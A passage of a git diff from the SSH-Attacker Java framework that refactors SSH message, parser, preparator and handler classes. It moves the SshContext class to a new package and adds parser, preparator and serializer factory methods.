de.rub.nds.sshattacker.core.protocol.transport.handler.extension; import de.rub.nds.sshattacker.core.constants.PublicKeyAlgorithm; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.ServerSigAlgsExtension; import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.ServerSigAlgsExtensionParser; import de.rub.nds.sshattacker.core.protocol.transport.preparator.extension.ServerSigAlgsExtensionPreparator; import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.ServerSigAlgsExtensionSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java index 6b07246b3..b2e311033 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/extension/UnknownExtensionHandler.java @@ -8,11 +8,11 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler.extension; import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.Preparator; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.UnknownExtension; import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.UnknownExtensionParser; import de.rub.nds.sshattacker.core.protocol.transport.serializer.extension.UnknownExtensionSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class UnknownExtensionHandler extends AbstractExtensionHandler { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ExtensionInfoMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ExtensionInfoMessage.java index 1c6b2e3b3..799a913b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ExtensionInfoMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ExtensionInfoMessage.java @@ -10,14 +10,18 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.ExtensionInfoMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.*; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.ExtensionInfoMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.ExtensionInfoMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.ExtensionInfoMessageSerializer; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; import jakarta.xml.bind.annotation.XmlElements; +import java.io.InputStream; import java.util.ArrayList; import java.util.List; @@ -69,7 +73,22 @@ public void addExtension(AbstractExtension extension) { @Override public ExtensionInfoMessageHandler getHandler(SshContext context) { - return new ExtensionInfoMessageHandler(context, this); + return new ExtensionInfoMessageHandler(context); + } + + @Override + public ExtensionInfoMessageParser getParser(SshContext context, InputStream stream) { + return new ExtensionInfoMessageParser(stream); + } + + @Override + public ExtensionInfoMessagePreparator getPreparator(SshContext context) { + return new ExtensionInfoMessagePreparator(context.getChooser(), this); + } + + @Override + public ExtensionInfoMessageSerializer getSerializer(SshContext context) { + return new ExtensionInfoMessageSerializer(this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewCompressMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewCompressMessage.java index 91b53ba5f..8e9a690d8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewCompressMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewCompressMessage.java @@ -7,14 +7,33 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.NewCompressMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.NewCompressMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.NewCompressMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.NewCompressMessageSerializer; +import java.io.InputStream; public class NewCompressMessage extends SshMessage { @Override public NewCompressMessageHandler getHandler(SshContext context) { - return new NewCompressMessageHandler(context, this); + return new NewCompressMessageHandler(context); + } + + @Override + public NewCompressMessageParser getParser(SshContext context, InputStream stream) { + return new NewCompressMessageParser(stream); + } + + @Override + public NewCompressMessagePreparator getPreparator(SshContext context) { + return new NewCompressMessagePreparator(context.getChooser(), this); + } + + @Override + public NewCompressMessageSerializer getSerializer(SshContext context) { + return new NewCompressMessageSerializer(this); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PingMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PingMessage.java index 3ca5c7b18..f18157f43 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PingMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PingMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.PingMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.PingMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.PingMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.PingMessageSerializer; +import java.io.InputStream; public class PingMessage extends SshMessage { @@ -59,6 +63,21 @@ public void setData(byte[] data, boolean adjustLengthField) { @Override public PingMessageHandler getHandler(SshContext context) { - return new PingMessageHandler(context, this); + return new PingMessageHandler(context); + } + + @Override + public PingMessageParser getParser(SshContext context, InputStream stream) { + return new PingMessageParser(stream); + } + + @Override + public PingMessagePreparator getPreparator(SshContext context) { + return new PingMessagePreparator(context.getChooser(), this); + } + + @Override + public PingMessageSerializer getSerializer(SshContext context) { + return new PingMessageSerializer(this); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PongMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PongMessage.java index 903ecddf3..7655a80db 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PongMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/PongMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.PongMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.PongMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.PongMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.PongMessageSerializer; +import java.io.InputStream; public class PongMessage extends SshMessage { @@ -59,6 +63,21 @@ public void setData(byte[] data, boolean adjustLengthField) { @Override public PongMessageHandler getHandler(SshContext context) { - return new PongMessageHandler(context, this); + return new PongMessageHandler(context); + } + + @Override + public PongMessageParser getParser(SshContext context, InputStream stream) { + return new PongMessageParser(stream); + } + + @Override + public PongMessagePreparator getPreparator(SshContext context) { + return new PongMessagePreparator(context.getChooser(), this); + } + + @Override + public PongMessageSerializer getSerializer(SshContext context) { + return new PongMessageSerializer(this); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java index 8adb34ace..8083410b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/AbstractExtension.java @@ -10,9 +10,9 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.AbstractExtensionHandler; -import de.rub.nds.sshattacker.core.state.SshContext; import java.nio.charset.StandardCharsets; public abstract class AbstractExtension> diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java index 676fe09c5..b64e28d2d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/DelayCompressionExtension.java @@ -13,8 +13,8 @@ import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.constants.CompressionMethod; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.DelayCompressionExtensionHandler; -import de.rub.nds.sshattacker.core.state.SshContext; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java index 87b018f04..1608789de 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/PingExtension.java @@ -10,8 +10,8 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.PingExtensionHandler; -import de.rub.nds.sshattacker.core.state.SshContext; import java.nio.charset.StandardCharsets; public class PingExtension extends AbstractExtension { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java index e329ee9c3..15c9c5193 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/ServerSigAlgsExtension.java @@ -12,8 +12,8 @@ import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.constants.PublicKeyAlgorithm; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.ServerSigAlgsExtensionHandler; -import de.rub.nds.sshattacker.core.state.SshContext; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java index 3c5c32de6..0ce54e840 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/extension/UnknownExtension.java @@ -10,8 +10,8 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.handler.extension.UnknownExtensionHandler; -import de.rub.nds.sshattacker.core.state.SshContext; public class UnknownExtension extends AbstractExtension { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java index c580bb2ef..d974831df 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java @@ -8,11 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.transport.parser; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; -import de.rub.nds.sshattacker.core.constants.Extension; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.ExtensionInfoMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.*; -import java.nio.charset.StandardCharsets; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -20,26 +19,33 @@ public class ExtensionInfoMessageParser extends SshMessageParser { - public NewCompressMessageParser(byte[] array) { - super(array); + public NewCompressMessageParser(InputStream stream) { + super(stream); } - public NewCompressMessageParser(byte[] array, int startPosition) { + @Override + public void parse(NewCompressMessage message) { + parseProtocolMessageContents(message); + } + + /* public NewCompressMessageParser(byte[] array, int startPosition) { super(array, startPosition); } @Override protected NewCompressMessage createMessage() { return new NewCompressMessage(); - } + }*/ @Override - protected void parseMessageSpecificContents() {} + protected void parseMessageSpecificContents(NewCompressMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PingMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PingMessageParser.java index a545b8f20..a67546349 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PingMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PingMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.PingMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,21 +19,28 @@ public class PingMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public PingMessageParser(byte[] array) { - super(array); - } - - public PingMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public PingMessageParser(InputStream stream) { + super(stream); } @Override - protected PingMessage createMessage() { - return new PingMessage(); + public void parse(PingMessage message) { + parseProtocolMessageContents(message); } + /* public PingMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + }*/ + + /* + @Override + protected PingMessage createMessage() { + return new PingMessage(); + } + */ + @Override - protected void parseMessageSpecificContents() { + protected void parseMessageSpecificContents(PingMessage message) { message.setDataLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Data length: {}", message.getDataLength().getValue()); message.setData(parseByteArrayField(message.getDataLength().getValue())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PongMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PongMessageParser.java index be92b7b1d..4229133a5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PongMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/PongMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.PongMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,21 +19,28 @@ public class PongMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public PongMessageParser(byte[] array) { - super(array); - } - - public PongMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public PongMessageParser(InputStream stream) { + super(stream); } @Override - protected PongMessage createMessage() { - return new PongMessage(); + public void parse(PongMessage message) { + parseProtocolMessageContents(message); } + /* public PongMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + }*/ + + /* + @Override + protected PongMessage createMessage() { + return new PongMessage(); + } + */ + @Override - protected void parseMessageSpecificContents() { + protected void parseMessageSpecificContents(PongMessage message) { message.setDataLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Data length: {}", message.getDataLength().getValue()); message.setData(parseByteArrayField(message.getDataLength().getValue())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DhGexKeyExchangeInitMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DhGexKeyExchangeInitMessagePreparator.java index 007194423..669c444cd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DhGexKeyExchangeInitMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DhGexKeyExchangeInitMessagePreparator.java @@ -26,7 +26,8 @@ public DhGexKeyExchangeInitMessagePreparator( public void prepareMessageSpecificContents() { DhKeyExchange keyExchange = chooser.getDhGexKeyExchange(); keyExchange.generateLocalKeyPair(); - getObject().setEphemeralPublicKey(keyExchange.getLocalKeyPair().getPublic().getY(), true); + getObject() + .setEphemeralPublicKey(keyExchange.getLocalKeyPair().getPublicKey().getY(), true); ExchangeHashInputHolder exchangeHash = chooser.getContext().getSshContext().getExchangeHashInputHolder(); exchangeHash.setDhGexClientPublicKey(getObject().getEphemeralPublicKey().getValue()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DisconnectMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DisconnectMessagePreparator.java index 238ad6be0..49d6c5d87 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DisconnectMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/DisconnectMessagePreparator.java @@ -26,7 +26,7 @@ public void prepareMessageSpecificContents() { getObject().setDescription("Test", true); getObject().setLanguageTag("", true); - if (chooser.getContext().getDelayCompressionExtensionNegotiationFailed()) { + if (chooser.getContext().getSshContext().getDelayCompressionExtensionNegotiationFailed()) { getObject().setReasonCode(DisconnectReason.SSH_DISCONNECT_COMPRESSION_ERROR); getObject() .setDescription( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/EcdhKeyExchangeInitMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/EcdhKeyExchangeInitMessagePreparator.java index d129bf6f3..8f098a986 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/EcdhKeyExchangeInitMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/EcdhKeyExchangeInitMessagePreparator.java @@ -25,7 +25,7 @@ public EcdhKeyExchangeInitMessagePreparator( public void prepareMessageSpecificContents() { AbstractEcdhKeyExchange keyExchange = chooser.getEcdhKeyExchange(); keyExchange.generateLocalKeyPair(); - byte[] encodedPublicKey = keyExchange.getLocalKeyPair().getPublic().getEncoded(); + byte[] encodedPublicKey = keyExchange.getLocalKeyPair().getPublicKey().getEncoded(); chooser.getContext() .getSshContext() .getExchangeHashInputHolder() diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/ExtensionInfoMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/ExtensionInfoMessagePreparator.java index 4044e06d9..f85fa96c0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/ExtensionInfoMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/ExtensionInfoMessagePreparator.java @@ -20,7 +20,7 @@ public ExtensionInfoMessagePreparator(Chooser chooser, ExtensionInfoMessage mess @Override public void prepareMessageSpecificContents() { - if (chooser.getContext().isClient()) { + if (chooser.getContext().getSshContext().isClient()) { getObject().setExtensionCount(chooser.getClientSupportedExtensions().size()); getObject().setExtensions(chooser.getClientSupportedExtensions()); } else { @@ -33,7 +33,7 @@ public void prepareMessageSpecificContents() { .forEach( extension -> extension - .getHandler(chooser.getContext()) + .getHandler(chooser.getContext().getSshContext()) .getPreparator() .prepare()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeInitMessagePreperator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeInitMessagePreperator.java index 2637b8b84..d7a3581b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeInitMessagePreperator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeInitMessagePreperator.java @@ -44,20 +44,20 @@ public void prepareMessageSpecificContents() { agreement.generateLocalKeyPair(); encapsulation.generateLocalKeyPair(); - byte[] pubKencapsulation = encapsulation.getLocalKeyPair().getPublic().getEncoded(); + byte[] pubKencapsulation = encapsulation.getLocalKeyPair().getPublicKey().getEncoded(); LOGGER.info( "PubKey Encapsulation = " + ArrayConverter.bytesToRawHexString(pubKencapsulation)); LOGGER.info( "PrivKey Encpasulation = " + ArrayConverter.bytesToRawHexString( - encapsulation.getLocalKeyPair().getPrivate().getEncoded())); + encapsulation.getLocalKeyPair().getPrivateKey().getEncoded())); - byte[] pubKagreement = agreement.getLocalKeyPair().getPublic().getEncoded(); + byte[] pubKagreement = agreement.getLocalKeyPair().getPublicKey().getEncoded(); LOGGER.info("PubKey Agreement = " + ArrayConverter.bytesToRawHexString(pubKagreement)); LOGGER.info( "PrivKey Agreement = " + ArrayConverter.bytesToRawHexString( - agreement.getLocalKeyPair().getPrivate().getEncoded())); + agreement.getLocalKeyPair().getPrivateKey().getEncoded())); ExchangeHashInputHolder inputHolder = chooser.getContext().getSshContext().getExchangeHashInputHolder(); switch (combiner) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeReplyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeReplyMessagePreparator.java index 967a19e29..6728943e8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeReplyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/HybridKeyExchangeReplyMessagePreparator.java @@ -62,7 +62,7 @@ private void prepareHybridKey() { ExchangeHashInputHolder inputHolder = chooser.getContext().getSshContext().getExchangeHashInputHolder(); - byte[] agreementBytes = agreement.getLocalKeyPair().getPublic().getEncoded(); + byte[] agreementBytes = agreement.getLocalKeyPair().getPublicKey().getEncoded(); byte[] encapsulationBytes = encapsulation.getEncryptedSharedSecret(); getObject().setPublicKey(agreementBytes, true); getObject().setCiphertext(encapsulationBytes, true); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/DelayCompressionExtensionPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/DelayCompressionExtensionPreparator.java index 9ca55de2c..8bc04f03c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/DelayCompressionExtensionPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/DelayCompressionExtensionPreparator.java @@ -21,7 +21,7 @@ public DelayCompressionExtensionPreparator( @Override protected void prepareExtensionSpecificContents() { - if (chooser.getContext().isClient()) { + if (chooser.getContext().getSshContext().isClient()) { getObject().setName(Extension.DELAY_COMPRESSION.getName(), true); getObject() .setCompressionMethodsClientToServer( @@ -29,7 +29,7 @@ protected void prepareExtensionSpecificContents() { getObject() .setCompressionMethodsServerToClient( chooser.getClientSupportedDelayCompressionMethods(), true); - chooser.getContext().setDelayCompressionExtensionSent(true); + chooser.getContext().getSshContext().setDelayCompressionExtensionSent(true); } else { getObject().setName(Extension.DELAY_COMPRESSION.getName(), true); getObject() @@ -38,7 +38,7 @@ protected void prepareExtensionSpecificContents() { getObject() .setCompressionMethodsServerToClient( chooser.getServerSupportedDelayCompressionMethods(), true); - chooser.getContext().setDelayCompressionExtensionSent(true); + chooser.getContext().getSshContext().setDelayCompressionExtensionSent(true); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/PingExtensionPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/PingExtensionPreparator.java index 3b455a72c..e9f2ab7b7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/PingExtensionPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/PingExtensionPreparator.java @@ -24,7 +24,7 @@ public PingExtensionPreparator(Chooser chooser, PingExtension extension) { @Override protected void prepareExtensionSpecificContents() { // Sending ping@openssh.com is not allowed by the client according to OpenSSH specs - if (chooser.getContext().isClient()) { + if (chooser.getContext().getSshContext().isClient()) { LOGGER.warn( "Client prepared PingExtension which is supposed to be sent by the server only!"); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/ServerSigAlgsExtensionPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/ServerSigAlgsExtensionPreparator.java index aa14b1fbe..85d2e7b87 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/ServerSigAlgsExtensionPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/extension/ServerSigAlgsExtensionPreparator.java @@ -25,7 +25,7 @@ public ServerSigAlgsExtensionPreparator(Chooser chooser, ServerSigAlgsExtension @Override protected void prepareExtensionSpecificContents() { // sending server-sig-algs extension is not allowed when acting as client - if (chooser.getContext().isClient()) { + if (chooser.getContext().getSshContext().isClient()) { LOGGER.warn( "Client prepared ServerSigAlgsExtension which is supposed to be sent by the server only!"); } else { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java index 10806a6e5..c8eafce8d 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java @@ -93,10 +93,6 @@ public void setExecutionException(Throwable executionException) { public String workflowOutputName; - private long startTimestamp; - private long endTimestamp; - private Throwable executionException; - private final LinkedList spawnedSubprocesses; public State() { @@ -379,30 +375,6 @@ public String getWorkflowOutputName() { return workflowOutputName; } - public long getStartTimestamp() { - return startTimestamp; - } - - public void setStartTimestamp(long startTimestamp) { - this.startTimestamp = startTimestamp; - } - - public long getEndTimestamp() { - return endTimestamp; - } - - public void setEndTimestamp(long endTimestamp) { - this.endTimestamp = endTimestamp; - } - - public Throwable getExecutionException() { - return executionException; - } - - public void setExecutionException(Throwable executionException) { - this.executionException = executionException; - } - public void addSpawnedSubprocess(Process process) { if (process != null) { spawnedSubprocesses.add(process); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java index 700f46703..c7d39c1ea 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java @@ -14,7 